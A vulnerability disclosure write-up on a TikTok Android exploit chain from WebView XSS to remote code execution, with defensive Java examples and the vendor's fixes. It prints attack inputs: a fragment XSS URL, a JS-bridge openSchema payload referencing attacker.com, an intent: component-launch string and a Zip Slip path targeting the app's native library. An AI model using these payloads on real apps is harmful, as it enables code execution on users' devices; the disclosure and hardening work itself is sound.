How TikTok’s Android WebView Exposes Multiple Vulnerabilities Leading to Remote Code Execution

Egyptian security researchers discovered a chain of flaws in TikTok’s Android app—including generic WebView XSS, Add Wiki Activity XSS, intent-based component launch, a Zip Slip in Tma Test Activity, and an RCE exploit—that can be combined to achieve remote code execution, and the report details TikTok’s remediation steps.

21CTO
Lead: Egyptian security researchers discovered multiple vulnerabilities in the TikTok Android app that can be chained to achieve remote code execution.

The researcher reported five issues that, chained together, lead from a WebView XSS to remote code execution:

Generic XSS on TikTok WebView

Another XSS in Add Wiki Activity

Arbitrary component launch

Zip Slip in Tma Test Activity

Remote Code Execution (RCE)

Generic XSS on TikTok WebView

TikTok uses a WebView component that can be triggered by a deep link to display the inbox page. The WebView loads “falcon” links from internal files for performance.

After page load, the app evaluates JavaScript via android.webkit.WebView.evaluateJavascript. An initial attempt to inject an XSS payload in the URL failed, so a Frida script was used to hook the method and observe the following code:

this.a.evaluateJavascript("JSON.stringify(window.performance.getEntriesByName('" + this.webviewURL + "'))", v2);

A payload placed in the path or query was URL-encoded before it reached this string, so the researcher moved it into the fragment (after #), which is not encoded:

https://m.tiktok.com/falcon/#'),alert(1));//

The single quote closes the JavaScript string literal, and alert(1) executes, confirming XSS in the WebView.
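The root cause of this first XSS is string concatenation: the URL is spliced into a JavaScript string literal, so any quote that survives encoding closes the literal. The following Java is an added example, not TikTok's code or the researcher's; it reproduces the vulnerable concatenation beside a version that serialises the URL as a JavaScript string literal with every character outside a small URL-safe set written as a unicode escape. The class and method names (SafeJsLiteral, jsStringLiteral, hardenedScript) and the sample URL are assumptions; it uses only the JDK, so it compiles without the Android SDK.

```java
import java.util.Locale;

public class SafeJsLiteral {

    // Vulnerable pattern from the decompiled snippet (assumed equivalent): raw
    // concatenation of an attacker-influenced URL into a JS string literal.
    static String vulnerableScript(String webviewUrl) {
        return "JSON.stringify(window.performance.getEntriesByName('" + webviewUrl + "'))";
    }

    // Encode an arbitrary Java string as a double-quoted JavaScript string
    // literal. Only unreserved URL characters are emitted verbatim; quotes,
    // parentheses, semicolons, angle brackets, backslashes, control characters
    // and non-ASCII code points (including U+2028/U+2029, which end a JS line)
    // are emitted as unicode escapes, so the value can never become code.
    static String jsStringLiteral(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 2).append('"');
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            boolean safe = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9')
                    || c == '/' || c == ':' || c == '.' || c == '-' || c == '_'
                    || c == '?' || c == '=' || c == '&' || c == '#' || c == '%';
            if (safe) {
                sb.append(c);
            } else {
                sb.append(String.format(Locale.ROOT, "\\u%04x", (int) c));
            }
        }
        return sb.append('"').toString();
    }

    // Hardened form: the URL is passed as data, not as script text.
    static String hardenedScript(String webviewUrl) {
        return "JSON.stringify(window.performance.getEntriesByName(" + jsStringLiteral(webviewUrl) + "))";
    }

    public static void main(String[] args) {
        // Constructed input: the fragment payload from the write-up, as the app would see it
        String url = "https://m.tiktok.com/falcon/#'),alert(1));//";
        System.out.println(vulnerableScript(url)); // the quote closes the literal; alert(1) is now code
        System.out.println(hardenedScript(url));   // quote and parentheses are escaped; still one string
    }
}
```

In the hardened output the quote, parentheses and semicolon appear as unicode escapes inside the literal, so getEntriesByName receives the whole URL as a string. On Android the same literal would be handed to WebView.evaluateJavascript; an alternative that avoids building script text from data entirely is to deliver the URL to page code through WebView.postWebMessage and read it there.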

Add Wiki Activity XSS

Add Wiki Activity validates URLs only for http or https schemes, assuming other schemes are safe. This allows a malicious javascript: scheme to bypass validation.

// Caller in AbsSecStrategy: a URL rejected by e.b() is treated as "does not need
// a secure link" and falls through to be loaded without further checks.
if(!e.b(arg8)) {
    com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
    return false;
}
// Only http/https URLs are validated here; any other scheme (e.g. javascript:)
// skips the secure-link handling instead of being refused. startsWith("http")
// already matches "https", and also matches unrelated schemes such as "httpx".
public static boolean b(String arg1) {
    return !TextUtils.isEmpty(arg1) && (arg1.startsWith("http") || arg1.startsWith("https")) && !e.a(arg1);
}

By invoking the bridge with a crafted schema, an attacker can execute JavaScript:

window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
    "__callback_id":"0",
    "func":"openSchema",
    "__msg_type":"callback",
    "params":{
        "schema":"aweme://wiki?url=javascript://m.tiktok.com/%0adocument.write(\"<h1>PoC</h1>\")&disable_app_link=false"
    },
    "JSSDK":"1",
    "namespace":"host",
    "__iframe_url":"http://iframe.attacker.com/"
}));

Arbitrary Component Launch

Add Wiki Activity WebView also supports the intent scheme without restrictions. Executing the following code launches the User Favorites Activity:

location.replace("intent:#Intent;component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;package=com.zhiliaoapp.musically;action=android.intent.action.VIEW;end;");
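The javascript: bypass and the unrestricted intent: handling share one root cause: every non-http(s) scheme is treated as not needing a check. The Java below is an added example, not TikTok's code, of the opposite policy: a URL is loadable only if it parses as a java.net.URI whose scheme is exactly http or https and which carries a host; everything else, including the javascript: and intent: strings from this write-up, is refused. The class and method names (WebViewUrlPolicy, isLoadableUrl) and the sample inputs are assumptions; it depends only on the JDK, so it runs without Android.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

public class WebViewUrlPolicy {

    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");

    // Allowlist, not denylist: returns true only for well-formed http(s) URLs
    // with a host. javascript:, intent:, file:, data: and scheme-less strings
    // are all refused. Unlike startsWith("http") this does not accept "httpx://",
    // and a URI that fails to parse (embedded quotes, control characters,
    // stray '<') is refused rather than guessed at.
    static boolean isLoadableUrl(String raw) {
        if (raw == null) return false;
        URI uri;
        try {
            uri = new URI(raw.trim());
        } catch (URISyntaxException e) {
            return false;
        }
        String scheme = uri.getScheme();
        if (scheme == null || !ALLOWED_SCHEMES.contains(scheme.toLowerCase(Locale.ROOT))) {
            return false;
        }
        String host = uri.getHost();
        return host != null && !host.isEmpty();
    }

    public static void main(String[] args) {
        // Constructed inputs: the two strings from the write-up plus edge cases
        String[] samples = {
            "https://m.tiktok.com/wiki",
            "HTTPS://m.tiktok.com/wiki",
            "javascript://m.tiktok.com/%0adocument.write(\"<h1>PoC</h1>\")",
            "intent:#Intent;component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;end;",
            "httpx://m.tiktok.com/",
            "http:///no-host",
            null
        };
        for (String s : samples) {
            System.out.println((isLoadableUrl(s) ? "load   " : "refuse ") + s);
        }
    }
}
```

Only the first two samples are loaded. If a product genuinely has to support intent: URLs from web content, the approach documented by Android is to parse them with Intent.parseUri(url, Intent.URI_INTENT_SCHEME), then call addCategory(Intent.CATEGORY_BROWSABLE), setComponent(null) and setSelector(null) before starting the intent, so a page can only reach components that opted in to browser launches rather than naming an arbitrary activity as the snippet above does.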

Zip Slip in Tma Test Activity

The Tma Test Activity updates the SDK by downloading a zip file and extracting it. The extraction routine contains a path‑traversal check that is disabled (argument arg7 is false), allowing a crafted zip to write files outside the intended directory.

// Traversal check in the extraction routine. It only runs when arg7 is true,
// and the caller passes false, so entry names containing "../" are written as-is.
if((arg7) && !TextUtils.isEmpty(v1) && (v1.contains("../"))) {
    // handling of a traversal entry; never reached because arg7 is false
}

By providing a zip with entries such as

../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/.../libjsc.so

an attacker can overwrite the app's native libraries.
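The check the decompiled code skips is the one that matters: whether each entry's resolved path stays inside the destination directory. The Java below is an added example, not TikTok's SDK-update code. It builds a small zip in memory (constructed data) with one benign entry and one traversal entry shaped like the libjsc.so overwrite, then extracts it with a canonical-path check that rejects the traversal entry. The names (SafeUnzip, resolveEntry, extract, buildSampleZip) are assumptions; it uses only java.util.zip and java.nio.file.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

public class SafeUnzip {

    // Resolve an entry name against the destination and refuse anything that
    // lands outside it after normalisation. This is the check the decompiled
    // routine disables; it is also stronger than contains("../"), which misses
    // absolute entry names and backslash separators.
    static Path resolveEntry(Path destDir, String entryName) throws IOException {
        Path base = destDir.toAbsolutePath().normalize();
        Path target = base.resolve(entryName.replace('\\', '/')).normalize();
        if (!target.startsWith(base) || target.equals(base)) {
            throw new IOException("Zip entry escapes destination: " + entryName);
        }
        return target;
    }

    // Extract a zip stream into destDir, returning the files written.
    static List<Path> extract(InputStream zipBytes, Path destDir) throws IOException {
        List<Path> written = new ArrayList<>();
        try (ZipInputStream zin = new ZipInputStream(zipBytes)) {
            ZipEntry entry;
            while ((entry = zin.getNextEntry()) != null) {
                Path target = resolveEntry(destDir, entry.getName()); // throws on traversal
                if (entry.isDirectory()) {
                    Files.createDirectories(target);
                } else {
                    Files.createDirectories(target.getParent());
                    Files.copy(zin, target); // reads to the end of this entry only
                    written.add(target);
                }
                zin.closeEntry();
            }
        }
        return written;
    }

    // Constructed test data: one benign entry, then one traversal entry.
    static byte[] buildSampleZip() throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ZipOutputStream zout = new ZipOutputStream(bos)) {
            zout.putNextEntry(new ZipEntry("sdk/manifest.json"));
            zout.write("{\"version\":1}".getBytes(StandardCharsets.UTF_8));
            zout.closeEntry();
            zout.putNextEntry(new ZipEntry("../../app_lib/libjsc.so"));
            zout.write(new byte[]{0x7f, 'E', 'L', 'F'}); // placeholder bytes, not a real library
            zout.closeEntry();
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        Path dest = Files.createTempDirectory("sdk-update");
        try {
            List<Path> files = extract(new ByteArrayInputStream(buildSampleZip()), dest);
            System.out.println("Extracted: " + files);
        } catch (IOException e) {
            System.out.println("Rejected: " + e.getMessage());
        }
    }
}
```

Resolving and then normalising covers the cases a substring test does not: absolute entry names, backslash separators, and sequences such as sdk/../../x. Because entries are processed as a stream, the benign entry is already on disk when the traversal entry is rejected; an update routine should therefore extract into a fresh staging directory and move it into place only after every entry has passed, rather than writing straight into the live library directory.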

Remote Code Execution (RCE)

Using the Zip Slip, a malicious library (e.g., libjsc.so) can be placed in the app’s native library directory. The overwritten library is loaded on the next app launch, enabling arbitrary code execution.

TikTok’s Mitigations

The vulnerable XSS code has been fixed.

TmaTestActivity has been removed.

Intent scheme usage has been restricted; AddWikiActivity and the main WebViewActivity no longer accept arbitrary intents.
